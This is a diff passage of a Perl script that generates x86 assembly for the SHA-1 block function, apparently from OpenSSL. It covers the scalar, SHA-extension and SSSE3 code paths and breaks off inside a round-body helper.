+	 &mov(&swtmp($n%16),$f);	# xi=f
+	&rotl($a,5);			# ROTATE(a,5)
+	 &lea($f,&DWP(0x5a827999,$f,$e));# f+=F_00_19(b,c,d)+e
+	&mov($e,&swtmp(($n+1)%16));	# pre-fetch f for next round
+	 &add($f,$a);			# f+=ROTATE(a,5)
+} else {
+	&mov($tmp1,$c);			# tmp1 to hold F_00_19(b,c,d)
+	 &xor($f,&swtmp(($n+2)%16));	# f to hold Xupdate(xi,xa,xb,xc,xd)
+	&xor($tmp1,$d);
+	 &xor($f,&swtmp(($n+8)%16));
+	&and($tmp1,$b);
+	 &xor($f,&swtmp(($n+13)%16));	# f holds xa^xb^xc^xd
+	&rotl($f,1);			# f=ROTATE(f,1)
+	 &xor($tmp1,$d);		# tmp1=F_00_19(b,c,d)
+	&add($e,$tmp1);			# e+=F_00_19(b,c,d)
+	 &mov($tmp1,$a);
+	&rotr($b,2);			# b=ROTATE(b,30)
+	 &mov(&swtmp($n%16),$f);	# xi=f
+	&rotl($tmp1,5);			# ROTATE(a,5)
+	 &lea($f,&DWP(0x5a827999,$f,$e));# f+=F_00_19(b,c,d)+e
+	&mov($e,&swtmp(($n+1)%16));	# pre-fetch f for next round
+	 &add($f,$tmp1);		# f+=ROTATE(a,5)
+}
+	}
+
+sub BODY_20_39
+	{
+	local($n,$a,$b,$c,$d,$e,$f)=@_;
+	local $K=($n<40)?0x6ed9eba1:0xca62c1d6;
+
+	&comment("20_39 $n");
+
+if ($alt) {
+	&xor($tmp1,$c);			# tmp1 to hold F_20_39(b,c,d), b^=c
+	 &xor($f,&swtmp(($n+2)%16));	# f to hold Xupdate(xi,xa,xb,xc,xd)
+	&xor($tmp1,$d);			# tmp1 holds F_20_39(b,c,d)
+	 &xor($f,&swtmp(($n+8)%16));
+	&add($e,$tmp1);			# e+=F_20_39(b,c,d)
+	 &xor($f,&swtmp(($n+13)%16));	# f holds xa^xb^xc^xd
+	&rotl($f,1);			# f=ROTATE(f,1)
+	 &mov($tmp1,$a);		# b in next round
+	&rotr($b,7);			# b=ROTATE(b,30)
+	 &mov(&swtmp($n%16),$f)		if($n<77);# xi=f
+	&rotl($a,5);			# ROTATE(a,5)
+	 &xor($b,$c)			if($n==39);# warm up for BODY_40_59
+	&and($tmp1,$b)			if($n==39);
+	 &lea($f,&DWP($K,$f,$e));	# f+=e+K_XX_YY
+	&mov($e,&swtmp(($n+1)%16))	if($n<79);# pre-fetch f for next round
+	 &add($f,$a);			# f+=ROTATE(a,5)
+	&rotr($a,5)			if ($n==79);
+} else {
+	&mov($tmp1,$b);			# tmp1 to hold F_20_39(b,c,d)
+	 &xor($f,&swtmp(($n+2)%16));	# f to hold Xupdate(xi,xa,xb,xc,xd)
+	&xor($tmp1,$c);
+	 &xor($f,&swtmp(($n+8)%16));
+	&xor($tmp1,$d);			# tmp1 holds F_20_39(b,c,d)
+	 &xor($f,&swtmp(($n+13)%16));	# f holds xa^xb^xc^xd
+	&rotl($f,1);			# f=ROTATE(f,1)
+	 &add($e,$tmp1);		# e+=F_20_39(b,c,d)
+	&rotr($b,2);			# b=ROTATE(b,30)
+	 &mov($tmp1,$a);
+	&rotl($tmp1,5);			# ROTATE(a,5)
+	 &mov(&swtmp($n%16),$f) if($n<77);# xi=f
+	&lea($f,&DWP($K,$f,$e));	# f+=e+K_XX_YY
+	 &mov($e,&swtmp(($n+1)%16)) if($n<79);# pre-fetch f for next round
+	&add($f,$tmp1);			# f+=ROTATE(a,5)
+}
+	}
+
+sub BODY_40_59
+	{
+	local($n,$a,$b,$c,$d,$e,$f)=@_;
+
+	&comment("40_59 $n");
+
+if ($alt) {
+	&add($e,$tmp1);			# e+=b&(c^d)
+	 &xor($f,&swtmp(($n+2)%16));	# f to hold Xupdate(xi,xa,xb,xc,xd)
+	&mov($tmp1,$d);
+	 &xor($f,&swtmp(($n+8)%16));
+	&xor($c,$d);			# restore $c
+	 &xor($f,&swtmp(($n+13)%16));	# f holds xa^xb^xc^xd
+	&rotl($f,1);			# f=ROTATE(f,1)
+	 &and($tmp1,$c);
+	&rotr($b,7);			# b=ROTATE(b,30)
+	 &add($e,$tmp1);		# e+=c&d
+	&mov($tmp1,$a);			# b in next round
+	 &mov(&swtmp($n%16),$f);	# xi=f
+	&rotl($a,5);			# ROTATE(a,5)
+	 &xor($b,$c)			if ($n<59);
+	&and($tmp1,$b)			if ($n<59);# tmp1 to hold F_40_59(b,c,d)
+	 &lea($f,&DWP(0x8f1bbcdc,$f,$e));# f+=K_40_59+e+(b&(c^d))
+	&mov($e,&swtmp(($n+1)%16));	# pre-fetch f for next round
+	 &add($f,$a);			# f+=ROTATE(a,5)
+} else {
+	&mov($tmp1,$c);			# tmp1 to hold F_40_59(b,c,d)
+	 &xor($f,&swtmp(($n+2)%16));	# f to hold Xupdate(xi,xa,xb,xc,xd)
+	&xor($tmp1,$d);
+	 &xor($f,&swtmp(($n+8)%16));
+	&and($tmp1,$b);
+	 &xor($f,&swtmp(($n+13)%16));	# f holds xa^xb^xc^xd
+	&rotl($f,1);			# f=ROTATE(f,1)
+	 &add($tmp1,$e);		# b&(c^d)+=e
+	&rotr($b,2);			# b=ROTATE(b,30)
+	 &mov($e,$a);			# e becomes volatile
+	&rotl($e,5);			# ROTATE(a,5)
+	 &mov(&swtmp($n%16),$f);	# xi=f
+	&lea($f,&DWP(0x8f1bbcdc,$f,$tmp1));# f+=K_40_59+e+(b&(c^d))
+	 &mov($tmp1,$c);
+	&add($f,$e);			# f+=ROTATE(a,5)
+	 &and($tmp1,$d);
+	&mov($e,&swtmp(($n+1)%16));	# pre-fetch f for next round
+	 &add($f,$tmp1);		# f+=c&d
+}
+	}
+
+&function_begin("sha1_block_data_order");
+if ($xmm) {
+  &static_label("shaext_shortcut")	if ($shaext);
+  &static_label("ssse3_shortcut");
+  &static_label("avx_shortcut")		if ($ymm);
+  &static_label("K_XX_XX");
+
+	&call	(&label("pic_point"));	# make it PIC!
+  &set_label("pic_point");
+	&blindpop($tmp1);
+	&picmeup($T,"OPENSSL_ia32cap_P",$tmp1,&label("pic_point"));
+	&lea	($tmp1,&DWP(&label("K_XX_XX")."-".&label("pic_point"),$tmp1));
+
+	&mov	($A,&DWP(0,$T));
+	&mov	($D,&DWP(4,$T));
+	&test	($D,1<<9);		# check SSSE3 bit
+	&jz	(&label("x86"));
+	&mov	($C,&DWP(8,$T));
+	&test	($A,1<<24);		# check FXSR bit
+	&jz	(&label("x86"));
+	if ($shaext) {
+		&test	($C,1<<29);		# check SHA bit
+		&jnz	(&label("shaext_shortcut"));
+	}
+	if ($ymm) {
+		&and	($D,1<<28);		# mask AVX bit
+		&and	($A,1<<30);		# mask "Intel CPU" bit
+		&or	($A,$D);
+		&cmp	($A,1<<28|1<<30);
+		&je	(&label("avx_shortcut"));
+	}
+	&jmp	(&label("ssse3_shortcut"));
+  &set_label("x86",16);
+}
+	&mov($tmp1,&wparam(0));	# SHA_CTX *c
+	&mov($T,&wparam(1));	# const void *input
+	&mov($A,&wparam(2));	# size_t num
+	&stack_push(16+3);	# allocate X[16]
+	&shl($A,6);
+	&add($A,$T);
+	&mov(&wparam(2),$A);	# pointer beyond the end of input
+	&mov($E,&DWP(16,$tmp1));# pre-load E
+	&jmp(&label("loop"));
+
+&set_label("loop",16);
+
+	# copy input chunk to X, but reversing byte order!
+	for ($i=0; $i<16; $i+=4)
+		{
+		&mov($A,&DWP(4*($i+0),$T));
+		&mov($B,&DWP(4*($i+1),$T));
+		&mov($C,&DWP(4*($i+2),$T));
+		&mov($D,&DWP(4*($i+3),$T));
+		&bswap($A);
+		&bswap($B);
+		&bswap($C);
+		&bswap($D);
+		&mov(&swtmp($i+0),$A);
+		&mov(&swtmp($i+1),$B);
+		&mov(&swtmp($i+2),$C);
+		&mov(&swtmp($i+3),$D);
+		}
+	&mov(&wparam(1),$T);	# redundant in 1st spin
+
+	&mov($A,&DWP(0,$tmp1));	# load SHA_CTX
+	&mov($B,&DWP(4,$tmp1));
+	&mov($C,&DWP(8,$tmp1));
+	&mov($D,&DWP(12,$tmp1));
+	# E is pre-loaded
+
+	for($i=0;$i<16;$i++)	{ &BODY_00_15($i,@V); unshift(@V,pop(@V)); }
+	for(;$i<20;$i++)	{ &BODY_16_19($i,@V); unshift(@V,pop(@V)); }
+	for(;$i<40;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+	for(;$i<60;$i++)	{ &BODY_40_59($i,@V); unshift(@V,pop(@V)); }
+	for(;$i<80;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+
+	(($V[5] eq $D) and ($V[0] eq $E)) or die;	# double-check
+
+	&mov($tmp1,&wparam(0));	# re-load SHA_CTX*
+	&mov($D,&wparam(1));	# D is last "T" and is discarded
+
+	&add($E,&DWP(0,$tmp1));	# E is last "A"...
+	&add($T,&DWP(4,$tmp1));
+	&add($A,&DWP(8,$tmp1));
+	&add($B,&DWP(12,$tmp1));
+	&add($C,&DWP(16,$tmp1));
+
+	&mov(&DWP(0,$tmp1),$E);	# update SHA_CTX
+	 &add($D,64);		# advance input pointer
+	&mov(&DWP(4,$tmp1),$T);
+	 &cmp($D,&wparam(2));	# have we reached the end yet?
+	&mov(&DWP(8,$tmp1),$A);
+	 &mov($E,$C);		# C is last "E" which needs to be "pre-loaded"
+	&mov(&DWP(12,$tmp1),$B);
+	 &mov($T,$D);		# input pointer
+	&mov(&DWP(16,$tmp1),$C);
+	&jb(&label("loop"));
+
+	&stack_pop(16+3);
+&function_end("sha1_block_data_order");
+
+if ($xmm) {
+if ($shaext) {
+######################################################################
+# Intel SHA Extensions implementation of SHA1 update function.
+#
+my ($ctx,$inp,$num)=("edi","esi","ecx");
+my ($ABCD,$E,$E_,$BSWAP)=map("xmm$_",(0..3));
+my @MSG=map("xmm$_",(4..7));
+
+sub sha1rnds4 {
+ my ($dst,$src,$imm)=@_;
+    if ("$dst:$src" =~ /xmm([0-7]):xmm([0-7])/)
+    {	&data_byte(0x0f,0x3a,0xcc,0xc0|($1<<3)|$2,$imm);	}
+}
+sub sha1op38 {
+ my ($opcodelet,$dst,$src)=@_;
+    if ("$dst:$src" =~ /xmm([0-7]):xmm([0-7])/)
+    {	&data_byte(0x0f,0x38,$opcodelet,0xc0|($1<<3)|$2);	}
+}
+sub sha1nexte	{ sha1op38(0xc8,@_); }
+sub sha1msg1	{ sha1op38(0xc9,@_); }
+sub sha1msg2	{ sha1op38(0xca,@_); }
+
+&function_begin("_sha1_block_data_order_shaext");
+	&call	(&label("pic_point"));	# make it PIC!
+	&set_label("pic_point");
+	&blindpop($tmp1);
+	&lea	($tmp1,&DWP(&label("K_XX_XX")."-".&label("pic_point"),$tmp1));
+&set_label("shaext_shortcut");
+	&mov	($ctx,&wparam(0));
+	&mov	("ebx","esp");
+	&mov	($inp,&wparam(1));
+	&mov	($num,&wparam(2));
+	&sub	("esp",32);
+
+	&movdqu	($ABCD,&QWP(0,$ctx));
+	&movd	($E,&QWP(16,$ctx));
+	&and	("esp",-32);
+	&movdqa	($BSWAP,&QWP(0x50,$tmp1));	# byte-n-word swap
+
+	&movdqu	(@MSG[0],&QWP(0,$inp));
+	&pshufd	($ABCD,$ABCD,0b00011011);	# flip word order
+	&movdqu	(@MSG[1],&QWP(0x10,$inp));
+	&pshufd	($E,$E,0b00011011);		# flip word order
+	&movdqu	(@MSG[2],&QWP(0x20,$inp));
+	&pshufb	(@MSG[0],$BSWAP);
+	&movdqu	(@MSG[3],&QWP(0x30,$inp));
+	&pshufb	(@MSG[1],$BSWAP);
+	&pshufb	(@MSG[2],$BSWAP);
+	&pshufb	(@MSG[3],$BSWAP);
+	&jmp	(&label("loop_shaext"));
+
+&set_label("loop_shaext",16);
+	&dec		($num);
+	&lea		("eax",&DWP(0x40,$inp));
+	&movdqa		(&QWP(0,"esp"),$E);	# offload $E
+	&paddd		($E,@MSG[0]);
+	&cmovne		($inp,"eax");
+	&movdqa		(&QWP(16,"esp"),$ABCD);	# offload $ABCD
+
+for($i=0;$i<20-4;$i+=2) {
+	&sha1msg1	(@MSG[0],@MSG[1]);
+	&movdqa		($E_,$ABCD);
+	&sha1rnds4	($ABCD,$E,int($i/5));	# 0-3...
+	&sha1nexte	($E_,@MSG[1]);
+	&pxor		(@MSG[0],@MSG[2]);
+	&sha1msg1	(@MSG[1],@MSG[2]);
+	&sha1msg2	(@MSG[0],@MSG[3]);
+
+	&movdqa		($E,$ABCD);
+	&sha1rnds4	($ABCD,$E_,int(($i+1)/5));
+	&sha1nexte	($E,@MSG[2]);
+	&pxor		(@MSG[1],@MSG[3]);
+	&sha1msg2	(@MSG[1],@MSG[0]);
+
+	push(@MSG,shift(@MSG));	push(@MSG,shift(@MSG));
+}
+	&movdqu		(@MSG[0],&QWP(0,$inp));
+	&movdqa		($E_,$ABCD);
+	&sha1rnds4	($ABCD,$E,3);		# 64-67
+	&sha1nexte	($E_,@MSG[1]);
+	&movdqu		(@MSG[1],&QWP(0x10,$inp));
+	&pshufb		(@MSG[0],$BSWAP);
+
+	&movdqa		($E,$ABCD);
+	&sha1rnds4	($ABCD,$E_,3);		# 68-71
+	&sha1nexte	($E,@MSG[2]);
+	&movdqu		(@MSG[2],&QWP(0x20,$inp));
+	&pshufb		(@MSG[1],$BSWAP);
+
+	&movdqa		($E_,$ABCD);
+	&sha1rnds4	($ABCD,$E,3);		# 72-75
+	&sha1nexte	($E_,@MSG[3]);
+	&movdqu		(@MSG[3],&QWP(0x30,$inp));
+	&pshufb		(@MSG[2],$BSWAP);
+
+	&movdqa		($E,$ABCD);
+	&sha1rnds4	($ABCD,$E_,3);		# 76-79
+	&movdqa		($E_,&QWP(0,"esp"));
+	&pshufb		(@MSG[3],$BSWAP);
+	&sha1nexte	($E,$E_);
+	&paddd		($ABCD,&QWP(16,"esp"));
+
+	&jnz		(&label("loop_shaext"));
+
+	&pshufd	($ABCD,$ABCD,0b00011011);
+	&pshufd	($E,$E,0b00011011);
+	&movdqu	(&QWP(0,$ctx),$ABCD)
+	&movd	(&DWP(16,$ctx),$E);
+	&mov	("esp","ebx");
+&function_end("_sha1_block_data_order_shaext");
+}
+######################################################################
+# The SSSE3 implementation.
+#
+# %xmm[0-7] are used as ring @X[] buffer containing quadruples of last
+# 32 elements of the message schedule or Xupdate outputs. First 4
+# quadruples are simply byte-swapped input, next 4 are calculated
+# according to method originally suggested by Dean Gaudet (modulo
+# being implemented in SSSE3). Once 8 quadruples or 32 elements are
+# collected, it switches to routine proposed by Max Locktyukhin.
+#
+# Calculations inevitably require temporary reqisters, and there are
+# no %xmm registers left to spare. For this reason part of the ring
+# buffer, X[2..4] to be specific, is offloaded to 3 quadriples ring
+# buffer on the stack. Keep in mind that X[2] is alias X[-6], X[3] -
+# X[-5], and X[4] - X[-4]...
+#
+# Another notable optimization is aggressive stack frame compression
+# aiming to minimize amount of 9-byte instructions...
+#
+# Yet another notable optimization is "jumping" $B variable. It means
+# that there is no register permanently allocated for $B value. This
+# allowed to eliminate one instruction from body_20_39...
+#
+my $Xi=4;			# 4xSIMD Xupdate round, start pre-seeded
+my @X=map("xmm$_",(4..7,0..3));	# pre-seeded for $Xi=4
+my @V=($A,$B,$C,$D,$E);
+my $j=0;			# hash round
+my $rx=0;
+my @T=($T,$tmp1);
+my $inp;
+
+my $_rol=sub { &rol(@_) };
+my $_ror=sub { &ror(@_) };
+
+&function_begin("_sha1_block_data_order_ssse3");
+	&call	(&label("pic_point"));	# make it PIC!
+	&set_label("pic_point");
+	&blindpop($tmp1);
+	&lea	($tmp1,&DWP(&label("K_XX_XX")."-".&label("pic_point"),$tmp1));
+&set_label("ssse3_shortcut");
+
+	&movdqa	(@X[3],&QWP(0,$tmp1));		# K_00_19
+	&movdqa	(@X[4],&QWP(16,$tmp1));		# K_20_39
+	&movdqa	(@X[5],&QWP(32,$tmp1));		# K_40_59
+	&movdqa	(@X[6],&QWP(48,$tmp1));		# K_60_79
+	&movdqa	(@X[2],&QWP(64,$tmp1));		# pbswap mask
+
+	&mov	($E,&wparam(0));		# load argument block
+	&mov	($inp=@T[1],&wparam(1));
+	&mov	($D,&wparam(2));
+	&mov	(@T[0],"esp");
+
+	# stack frame layout
+	#
+	# +0	X[0]+K	X[1]+K	X[2]+K	X[3]+K	# XMM->IALU xfer area
+	#	X[4]+K	X[5]+K	X[6]+K	X[7]+K
+	#	X[8]+K	X[9]+K	X[10]+K	X[11]+K
+	#	X[12]+K	X[13]+K	X[14]+K	X[15]+K
+	#
+	# +64	X[0]	X[1]	X[2]	X[3]	# XMM->XMM backtrace area
+	#	X[4]	X[5]	X[6]	X[7]
+	#	X[8]	X[9]	X[10]	X[11]	# even borrowed for K_00_19
+	#
+	# +112	K_20_39	K_20_39	K_20_39	K_20_39	# constants
+	#	K_40_59	K_40_59	K_40_59	K_40_59
+	#	K_60_79	K_60_79	K_60_79	K_60_79
+	#	K_00_19	K_00_19	K_00_19	K_00_19
+	#	pbswap mask
+	#
+	# +192	ctx				# argument block
+	# +196	inp
+	# +200	end
+	# +204	esp
+	&sub	("esp",208);
+	&and	("esp",-64);
+
+	&movdqa	(&QWP(112+0,"esp"),@X[4]);	# copy constants
+	&movdqa	(&QWP(112+16,"esp"),@X[5]);
+	&movdqa	(&QWP(112+32,"esp"),@X[6]);
+	&shl	($D,6);				# len*64
+	&movdqa	(&QWP(112+48,"esp"),@X[3]);
+	&add	($D,$inp);			# end of input
+	&movdqa	(&QWP(112+64,"esp"),@X[2]);
+	&add	($inp,64);
+	&mov	(&DWP(192+0,"esp"),$E);		# save argument block
+	&mov	(&DWP(192+4,"esp"),$inp);
+	&mov	(&DWP(192+8,"esp"),$D);
+	&mov	(&DWP(192+12,"esp"),@T[0]);	# save original %esp
+
+	&mov	($A,&DWP(0,$E));		# load context
+	&mov	($B,&DWP(4,$E));
+	&mov	($C,&DWP(8,$E));
+	&mov	($D,&DWP(12,$E));
+	&mov	($E,&DWP(16,$E));
+	&mov	(@T[0],$B);			# magic seed
+
+	&movdqu	(@X[-4&7],&QWP(-64,$inp));	# load input to %xmm[0-3]
+	&movdqu	(@X[-3&7],&QWP(-48,$inp));
+	&movdqu	(@X[-2&7],&QWP(-32,$inp));
+	&movdqu	(@X[-1&7],&QWP(-16,$inp));
+	&pshufb	(@X[-4&7],@X[2]);		# byte swap
+	&pshufb	(@X[-3&7],@X[2]);
+	&pshufb	(@X[-2&7],@X[2]);
+	&movdqa	(&QWP(112-16,"esp"),@X[3]);	# borrow last backtrace slot
+	&pshufb	(@X[-1&7],@X[2]);
+	&paddd	(@X[-4&7],@X[3]);		# add K_00_19
+	&paddd	(@X[-3&7],@X[3]);
+	&paddd	(@X[-2&7],@X[3]);
+	&movdqa	(&QWP(0,"esp"),@X[-4&7]);	# X[]+K xfer to IALU
+	&psubd	(@X[-4&7],@X[3]);		# restore X[]
+	&movdqa	(&QWP(0+16,"esp"),@X[-3&7]);
+	&psubd	(@X[-3&7],@X[3]);
+	&movdqa	(&QWP(0+32,"esp"),@X[-2&7]);
+	&mov	(@T[1],$C);
+	&psubd	(@X[-2&7],@X[3]);
+	&xor	(@T[1],$D);
+	&pshufd	(@X[0],@X[-4&7],0xee);		# was &movdqa	(@X[0],@X[-3&7]);
+	&and	(@T[0],@T[1]);
+	&jmp	(&label("loop"));
+
+######################################################################
+# SSE instruction sequence is first broken to groups of indepentent
+# instructions, independent in respect to their inputs and shifter
+# (not all architectures have more than one). Then IALU instructions
+# are "knitted in" between the SSE groups. Distance is maintained for
+# SSE latency of 2 in hope that it fits better upcoming AMD Bulldozer
+# [which allegedly also implements SSSE3]...
+#
+# Temporary registers usage. X[2] is volatile at the entry and at the
+# end is restored from backtrace ring buffer. X[3] is expected to
+# contain current K_XX_XX constant and is used to caclulate X[-1]+K
+# from previous round, it becomes volatile the moment the value is
+# saved to stack for transfer to IALU. X[4] becomes volatile whenever
+# X[-4] is accumulated and offloaded to backtrace ring buffer, at the
+# end it is loaded with next K_XX_XX [which becomes X[3] in next
+# round]...
+#
+sub Xupdate_ssse3_16_31()		# recall that $Xi starts wtih 4
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 40 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&punpcklqdq(@X[0],@X[-3&7]);	# compose "X[-14]" in "X[0]", was &palignr(@X[0],@X[-4&7],8);
+	&movdqa	(@X[2],@X[-1&7]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	  &paddd	(@X[3],@X[-1&7]);
+	  &movdqa	(&QWP(64+16*(($Xi-4)%3),"esp"),@X[-4&7]);# save X[] to backtrace buffer
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	&psrldq	(@X[2],4);		# "X[-3]", 3 dwords
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&pxor	(@X[0],@X[-4&7]);	# "X[0]"^="X[-16]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+
+	&pxor	(@X[2],@X[-2&7]);	# "X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&pxor	(@X[0],@X[2]);		# "X[0]"^="X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	  &movdqa	(&QWP(0+16*(($Xi-1)&3),"esp"),@X[3]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&movdqa	(@X[4],@X[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	&movdqa (@X[2],@X[0]);
+	 eval(shift(@insns));
+
+	&pslldq	(@X[4],12);		# "X[0]"<<96, extract one dword
+	&paddd	(@X[0],@X[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&psrld	(@X[2],31);
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	&movdqa	(@X[3],@X[4]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&psrld	(@X[4],30);
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	&por	(@X[0],@X[2]);		# "X[0]"<<<=1
+	 eval(shift(@insns));
+	  &movdqa	(@X[2],&QWP(64+16*(($Xi-6)%3),"esp")) if ($Xi>5);	# restore X[] from backtrace buffer
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&pslld	(@X[3],2);
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	&pxor   (@X[0],@X[4]);
+	  &movdqa	(@X[4],&QWP(112-16+16*(($Xi)/5),"esp"));	# K_XX_XX
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&pxor	(@X[0],@X[3]);		# "X[0]"^=("X[0]"<<96)<<<2
+	  &pshufd	(@X[1],@X[-3&7],0xee)	if ($Xi<7);	# was &movdqa	(@X[1],@X[-2&7])
+	  &pshufd	(@X[3],@X[-1&7],0xee)	if ($Xi==7);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	 foreach (@insns) { eval; }	# remaining instructions [if any]
+
+  $Xi++;	push(@X,shift(@X));	# "rotate" X[]
+}
+
+sub Xupdate_ssse3_32_79()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 to 44 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));		# body_20_39
+	&pxor	(@X[0],@X[-4&7]);	# "X[0]"="X[-32]"^"X[-16]"
+	&punpcklqdq(@X[2],@X[-1&7]);	# compose "X[-6]", was &palignr(@X[2],@X[-2&7],8)
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+
+	&pxor	(@X[0],@X[-7&7]);	# "X[0]"^="X[-28]"
+	  &movdqa	(&QWP(64+16*(($Xi-4)%3),"esp"),@X[-4&7]);	# save X[] to backtrace buffer
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns))		if (@insns[0] =~ /_rol/);
+	 if ($Xi%5) {
+	  &movdqa	(@X[4],@X[3]);	# "perpetuate" K_XX_XX...
+	 } else {			# ... or load next one
+	  &movdqa	(@X[4],&QWP(112-16+16*($Xi/5),"esp"));
+	 }
+	 eval(shift(@insns));		# ror
+	  &paddd	(@X[3],@X[-1&7]);
+	 eval(shift(@insns));
+
+	&pxor	(@X[0],@X[2]);		# "X[0]"^="X[-6]"
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+
+	&movdqa	(@X[2],@X[0]);
+	  &movdqa	(&QWP(0+16*(($Xi-1)&3),"esp"),@X[3]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+	 eval(shift(@insns))		if (@insns[0] =~ /_rol/);
+
+	&pslld	(@X[0],2);
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	&psrld	(@X[2],30);
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+	 eval(shift(@insns))		if (@insns[1] =~ /_rol/);
+	 eval(shift(@insns))		if (@insns[0] =~ /_rol/);
+
+	&por	(@X[0],@X[2]);		# "X[0]"<<<=2
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	  &movdqa	(@X[2],&QWP(64+16*(($Xi-6)%3),"esp")) if($Xi<19);	# restore X[] from backtrace buffer
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	  &pshufd	(@X[3],@X[-1],0xee)	if ($Xi<19);	# was &movdqa	(@X[3],@X[0])
+	 eval(shift(@insns));
+
+	 foreach (@insns) { eval; }	# remaining instructions
+
+  $Xi++;	push(@X,shift(@X));	# "rotate" X[]
+}
+
+sub Xuplast_ssse3_80()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &paddd	(@X[3],@X[-1&7]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	  &movdqa	(&QWP(0+16*(($Xi-1)&3),"esp"),@X[3]);	# X[]+K xfer IALU
+
+	 foreach (@insns) { eval; }		# remaining instructions
+
+	&mov	($inp=@T[1],&DWP(192+4,"esp"));
+	&cmp	($inp,&DWP(192+8,"esp"));
+	&je	(&label("done"));
+
+	&movdqa	(@X[3],&QWP(112+48,"esp"));	# K_00_19
+	&movdqa	(@X[2],&QWP(112+64,"esp"));	# pbswap mask
+	&movdqu	(@X[-4&7],&QWP(0,$inp));	# load input
+	&movdqu	(@X[-3&7],&QWP(16,$inp));
+	&movdqu	(@X[-2&7],&QWP(32,$inp));
+	&movdqu	(@X[-1&7],&QWP(48,$inp));
+	&add	($inp,64);
+	&pshufb	(@X[-4&7],@X[2]);		# byte swap
+	&mov	(&DWP(192+4,"esp"),$inp);
+	&movdqa	(&QWP(112-16,"esp"),@X[3]);	# borrow last backtrace slot
+
+  $Xi=0;
+}
+
+sub Xloop_ssse3()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&pshufb	(@X[($Xi-3)&7],@X[2]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&paddd	(@X[($Xi-4)&7],@X[3]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&movdqa	(&QWP(0+16*$Xi,"esp"),@X[($Xi-4)&7]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&psubd	(@X[($Xi-4)&7],@X[3]);
+
+	foreach (@insns) { eval; }
+  $Xi++;
+}
+
+sub Xtail_ssse3()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	foreach (@insns) { eval; }
+}
+
+sub body_00_19 () {	# ((c^d)&b)^d
+	# on start @T[0]=(c^d)&b
+	return &body_20_39()	if ($rx==19);	$rx++;
+	(
+	'($a,$b,$c,$d,$e)=@V;'.
+	'&$_ror	($b,$j?7:2);',	# $b>>>2
+	'&xor	(@T[0],$d);',
+	'&mov	(@T[1],$a);',	# $b in next round
+
+	'&add	($e,&DWP(4*($j&15),"esp"));',	# X[]+K xfer
+	'&xor	($b,$c);',	# $c^$d for next round
+
+	'&$_rol	($a,5);',
+	'&add	($e,@T[0]);',
+	'&and	(@T[1],$b);',	# ($b&($c^$d)) for next round
+
+	'&xor	($b,$c);',	# restore $b
+	'&add	($e,$a);'	.'$j++; unshift(@V,pop(@V)); unshift(@T,pop(@T));'
+	);
+}
+
+sub body_20_39 () {	# b^d^c
+	# on entry @T[0]=b^d
